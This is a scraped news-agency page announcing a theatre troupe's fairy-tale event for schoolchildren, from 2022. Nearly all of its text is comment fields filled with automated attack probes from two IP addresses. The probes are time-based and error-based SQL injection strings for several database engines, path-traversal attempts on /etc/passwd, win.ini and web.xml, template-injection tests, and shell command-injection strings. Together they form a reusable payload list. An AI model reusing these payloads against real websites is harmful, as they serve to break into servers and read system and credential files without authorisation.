“Бүтээлч Бамбүү” театрын уран бүтээлчид 29 дүгээр тусгай сургуулийн сурагчдад үлгэр амилах цаг өдөрлөгийг зохион байгууллаа

ВИДЕО МЭДЭЭ
montastudio@montsame.gov.mn
2022-11-30 08:53:01
Related news
Comments
 • admin 185.234.72.114 432 days

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('a',19)='a
 • admin 185.234.72.114 432 days

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',0)='m
 • admin 185.234.72.114 432 days

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('z',19)
 • admin 185.234.72.114 432 days

  123456/**/and/**/3=DBMS_PIPE.RECEIVE_MESSAGE('o',0)
 • admin 185.234.72.114 432 days

  123456'and(select+1)>0waitfor/**/delay'0:0:19
 • admin 185.234.72.114 432 days

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 185.234.72.114 432 days

  123456/**/and(select+1)>0waitfor/**/delay'0:0:19'/**/
 • admin 185.234.72.114 432 days

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • admin 185.234.72.114 432 days

  123456'/**/and(select'1'from/**/pg_sleep(19))::text>'0
 • admin 185.234.72.114 432 days

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • admin 185.234.72.114 432 days

  123456/**/and(select+1/**/from/**/pg_sleep(19))>0/**/
 • admin 185.234.72.114 432 days

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • admin 185.234.72.114 432 days

  123456"and(select*from(select+sleep(19))a/**/union/**/select+1)="
 • admin 185.234.72.114 432 days

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • admin 185.234.72.114 432 days

  123456'and(select*from(select+sleep(19))a/**/union/**/select+1)='
 • admin 185.234.72.114 432 days

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 185.234.72.114 432 days

  (select*from(select+sleep(19)union/**/select+1)a)
 • admin 185.234.72.114 432 days

  (select*from(select+sleep(0)union/**/select+1)a)
 • admin 185.234.72.114 432 days

  123456"and"m"="d
 • admin 185.234.72.114 432 days

  123456"and"v"="v
 • admin 185.234.72.114 432 days

  123456'and'k'='g
 • admin 185.234.72.114 432 days

  123456'and'q'='q
 • admin 185.234.72.114 432 days

  123456/**/and+2=6
 • admin 185.234.72.114 432 days

  123456/**/and+0=0
 • admin'"\( 185.234.72.114 432 days

  123456
 • admin鎈'"\( 185.234.72.114 432 days

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1810054126')))>'0 185.234.72.114 432 days

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1029088856'))) 185.234.72.114 432 days

  123456
 • admin/**/and/**/cast(md5('1519834762')as/**/int)>0 185.234.72.114 432 days

  123456
 • admin'and(select'1'from/**/cast(md5(1214120428)as/**/int))>'0 185.234.72.114 432 days

  123456
 • extractvalue(1,concat(char(126),md5(1835222546))) 185.234.72.114 432 days

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1004339879)))and" 185.234.72.114 432 days

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1347842706)))and' 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  123456'"\(
 • admin 185.234.72.114 432 days

  123456鎈'"\(
 • admin 185.234.72.114 432 days

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1944307289')))>'0
 • admin 185.234.72.114 432 days

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1760119050')))
 • admin 185.234.72.114 432 days

  123456/**/and/**/cast(md5('1128822333')as/**/int)>0
 • admin 185.234.72.114 432 days

  123456'and(select'1'from/**/cast(md5(1517089492)as/**/int))>'0
 • admin 185.234.72.114 432 days

  extractvalue(1,concat(char(126),md5(1849638826)))
 • admin 185.234.72.114 432 days

  123456"and/**/extractvalue(1,concat(char(126),md5(1832107852)))and"
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',19)='b 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  123456'and/**/extractvalue(1,concat(char(126),md5(1331433727)))and'
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('x',0)='x 185.234.72.114 432 days

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:19 185.234.72.114 432 days

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 185.234.72.114 432 days

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(19))::text>'0 185.234.72.114 432 days

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 185.234.72.114 432 days

  123456
 • admin"and(select*from(select+sleep(19))a/**/union/**/select+1)=" 185.234.72.114 432 days

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 185.234.72.114 432 days

  123456
 • admin'and(select*from(select+sleep(19))a/**/union/**/select+1)=' 185.234.72.114 432 days

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  123456
 • '-var_dump(md5(375874909))-' 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  ${(983781292+914567790)?c}
 • admin 185.234.72.114 432 days

  123456
 • admin'and'f'='f 185.234.72.114 432 days

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  123456|expr 966566495 + 851446135
 • nduivfohplytlsutimej 185.234.72.114 432 days

  123456
 • ${@var_dump(md5(881490825))}; 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  '-var_dump(md5(574215133))-'
 • ${973928328+977134866} 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  ${947957685+995300137}
 • admin 185.234.72.114 432 days

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  ${@var_dump(md5(520540563))};
 • admin 185.234.72.114 432 days

  nduivfohplytlsutimej
 • admin 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 185.234.72.114 432 days

  123456
 • admin 185.234.72.114 432 days

  /*1*/{{875420699+980163158}}
 • admin 185.234.72.114 432 days

  123456 expr 829409666 + 988086136
 • admin 185.234.72.114 432 days

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('q',10)='q 194.163.191.42 433 days

  123456
 • admin'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('m',0)='m 194.163.191.42 433 days

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:10 194.163.191.42 433 days

  123456
 • admin'and(select+1)>0waitfor/**/delay'0:0:0 194.163.191.42 433 days

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(10))::text>'0 194.163.191.42 433 days

  123456
 • admin'/**/and(select'1'from/**/pg_sleep(0))::text>'0 194.163.191.42 433 days

  123456
 • admin"and(select*from(select+sleep(10))a/**/union/**/select+1)=" 194.163.191.42 433 days

  123456
 • admin"and(select*from(select+sleep(0))a/**/union/**/select+1)=" 194.163.191.42 433 days

  123456
 • admin'and(select*from(select+sleep(10))a/**/union/**/select+1)=' 194.163.191.42 433 days

  123456
 • admin'and(select*from(select+sleep(0))a/**/union/**/select+1)=' 194.163.191.42 433 days

  123456
 • admin"and"c"="c 194.163.191.42 433 days

  123456
 • admin"and"z"="z 194.163.191.42 433 days

  123456
 • admin'and'p'='o 194.163.191.42 433 days

  123456
 • admin'and'x'='x 194.163.191.42 433 days

  123456
 • ../../../../WEB-INF/web.xml;admin 194.163.191.42 433 days

  123456
 • ../../../../WEB-INF/web.xml 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('o',10)='o
 • admin 194.163.191.42 433 days

  123456'/**/and/**/DBMS_PIPE.RECEIVE_MESSAGE('b',0)='b
 • admin 194.163.191.42 433 days

  123456/**/and/**/4=DBMS_PIPE.RECEIVE_MESSAGE('g',10)
 • admin 194.163.191.42 433 days

  123456/**/and/**/1=DBMS_PIPE.RECEIVE_MESSAGE('o',0)
 • ../../../WEB-INF/web.xml;admin 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456'and(select+1)>0waitfor/**/delay'0:0:10
 • ../../../WEB-INF/web.xml 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456'and(select+1)>0waitfor/**/delay'0:0:0
 • admin 194.163.191.42 433 days

  123456/**/and(select+1)>0waitfor/**/delay'0:0:10'/**/
 • ../../WEB-INF/web.xml;admin 194.163.191.42 433 days

  123456
 • ../../WEB-INF/web.xml 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456/**/and(select+1)>0waitfor/**/delay'0:0:0'/**/
 • ../WEB-INF/web.xml;admin 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456'/**/and(select'1'from/**/pg_sleep(10))::text>'0
 • ../WEB-INF/web.xml 194.163.191.42 433 days

  123456
 • WEB-INF/web.xml;admin 194.163.191.42 433 days

  123456
 • WEB-INF/web.xml 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456'/**/and(select'1'from/**/pg_sleep(0))::text>'0
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215Windows%u2215win%u002eini 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456/**/and(select+1/**/from/**/pg_sleep(10))>0/**/
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fWindows%2fwin%2eini 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456/**/and(select+1/**/from/**/pg_sleep(0))>0/**/
 • ../../../../../../Windows/win.iniadmin 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456"and(select*from(select+sleep(10))a/**/union/**/select+1)="
 • ./../../../../../../Windows/win.ini 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456"and(select*from(select+sleep(0))a/**/union/**/select+1)="
 • ../../../../../../Windows/win.ini 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456'and(select*from(select+sleep(10))a/**/union/**/select+1)='
 • admin 194.163.191.42 433 days

  123456'and(select*from(select+sleep(0))a/**/union/**/select+1)='
 • admin 194.163.191.42 433 days

  (select*from(select+sleep(10)union/**/select+1)a)
 • admin 194.163.191.42 433 days

  (select*from(select+sleep(0)union/**/select+1)a)
 • ../../../../../../../../../../../../../../../../../../Windows/win.iniadmin 194.163.191.42 433 days

  123456
 • ./../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456"and"f"="p
 • admin 194.163.191.42 433 days

  123456"and"c"="c
 • ../../../../../../../../../../../../../../../../../../Windows/win.ini 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456'and'g'='y
 • %u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216%u002e%u002e%u2216Windows%u2216win%u002eini 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456'and't'='t
 • admin 194.163.191.42 433 days

  123456/**/and+3=6
 • %2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin%2eini 194.163.191.42 433 days

  123456
 • ..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456/**/and+4=4
 • .\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 433 days

  123456
 • ..\..\..\..\..\..\Windows\win.ini 194.163.191.42 433 days

  123456
 • admin'"\( 194.163.191.42 433 days

  123456
 • admin鎈'"\( 194.163.191.42 433 days

  123456
 • admin'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1943419945')))>'0 194.163.191.42 433 days

  123456
 • convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1014618749'))) 194.163.191.42 433 days

  123456
 • <%- 973276604+978670083 %> 194.163.191.42 433 days

  123456
 • admin/**/and/**/cast(md5('1450925548')as/**/int)>0 194.163.191.42 433 days

  123456
 • #set($c=982729815+894076565)${c}$c 194.163.191.42 433 days

  123456
 • admin'and(select'1'from/**/cast(md5(1369807488)as/**/int))>'0 194.163.191.42 433 days

  123456
 • ${(951349527+860056193)?c} 194.163.191.42 433 days

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.iniadmin 194.163.191.42 433 days

  123456
 • extractvalue(1,concat(char(126),md5(1362180398))) 194.163.191.42 433 days

  123456
 • expr 817068905 + 877384428 194.163.191.42 433 days

  123456
 • .\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 433 days

  123456
 • admin"and/**/extractvalue(1,concat(char(126),md5(1166788318)))and" 194.163.191.42 433 days

  123456
 • ${910009842+890463009} 194.163.191.42 433 days

  123456
 • admin&set /A 975173790+896361428 194.163.191.42 433 days

  123456
 • ..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Windows\win.ini 194.163.191.42 433 days

  123456
 • admin$(expr 828213507 + 811024233) 194.163.191.42 433 days

  123456
 • admin'and/**/extractvalue(1,concat(char(126),md5(1569735749)))and' 194.163.191.42 433 days

  123456
 • /*1*/{{934398991+887626886}} 194.163.191.42 433 days

  123456
 • %u2215etc%u2215passwd 194.163.191.42 433 days

  123456
 • admin|expr 858068477 + 936766126 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456'"\(
 • admin 194.163.191.42 433 days

  <%- 952742888+900110846 %>
 • %2fetc%2fpasswd 194.163.191.42 433 days

  123456
 • admin expr 807574366 + 988890105 194.163.191.42 433 days

  123456
 • /etc/passwdadmin 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  #set($c=811156707+981302465)${c}$c
 • admin 194.163.191.42 433 days

  expr 908886834 + 869425541
 • admin 194.163.191.42 433 days

  123456&set /A 856213207+839081400
 • /etc/passwd 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456鎈'"\(
 • admin 194.163.191.42 433 days

  123456$(expr 859104348 + 969660751)
 • admin 194.163.191.42 433 days

  ${(991314847+955628836)?c}
 • %u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215%u002e%u002e%u2215etc%u2215passwd 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1961020103')))>'0
 • admin 194.163.191.42 433 days

  ${828260535+909141252}
 • admin 194.163.191.42 433 days

  123456|expr 895679075 + 910552831
 • admin 194.163.191.42 433 days

  /*1*/{{961748186+971684063}}
 • %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456
 • ./../../../../../../etc/passwd 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','1732602616')))
 • ../../../../../../etc/passwdadmin 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456 expr 921595821 + 962747015
 • admin 194.163.191.42 433 days

  123456/**/and/**/cast(md5('1848066260')as/**/int)>0
 • ${940453290+984516046} 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  ${910594732+839444904}
 • admin 194.163.191.42 433 days

  123456'and(select'1'from/**/cast(md5(1748757066)as/**/int))>'0
 • ../../../../../../etc/passwd 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  extractvalue(1,concat(char(126),md5(1642368206)))
 • qjeosnpvygubrkbcxmdt 194.163.191.42 433 days

  123456
 • '-var_dump(md5(834009736))-' 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456"and/**/extractvalue(1,concat(char(126),md5(1843463683)))and"
 • ${@var_dump(md5(102229005))}; 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456'and/**/extractvalue(1,concat(char(126),md5(1526068531)))and'
 • admin 194.163.191.42 433 days

  qjeosnpvygubrkbcxmdt
 • admin 194.163.191.42 433 days

  '-var_dump(md5(711047914))-'
 • admin 194.163.191.42 433 days

  123456
 • ./../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  ${@var_dump(md5(639269703))};
 • ../../../../../../../../../../../../../../../../../../etc/passwdadmin 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456
 • ../../../../../../../../../../../../../../../../../../etc/passwd 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456
 • admin 194.163.191.42 433 days

  123456